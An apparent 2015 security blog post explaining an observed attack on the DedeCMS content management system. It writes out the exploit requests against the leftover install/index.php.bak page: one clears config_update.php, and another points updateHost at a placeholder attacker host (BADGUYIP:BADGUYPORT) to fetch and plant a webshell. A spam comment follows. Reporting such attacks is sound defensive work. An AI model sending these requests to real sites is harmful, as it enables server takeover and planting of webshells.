Thursday, December 17, 2015

DedeCMS File Upload vuln real example

Saw this attack below that appears to be targted at China's popular CMS dedeCMS.

HEAD /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

It appears that if this vulnerable page was available and exposed and not patched then the attacker can gain remote access per this blog i read Above is step 1 in the process which Clears the contents of config_update.php, which is likely an important file for the CMS and if empty now the guards are down on the site. Then the 2nd step it says is that the attacker will send a similar request that Create local HTTP services like this below.

GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://BADGUYIP:BADGUYPORT/

And your webshell would now live here

GET /install/hello.php

and your site is owned.



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. php injection walk-thru
  3. vbulletin rce walk-thru


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

2 comments:

  1. Bluehost is ultimately the best web-hosting provider with plans for all of your hosting requirments.

    ReplyDelete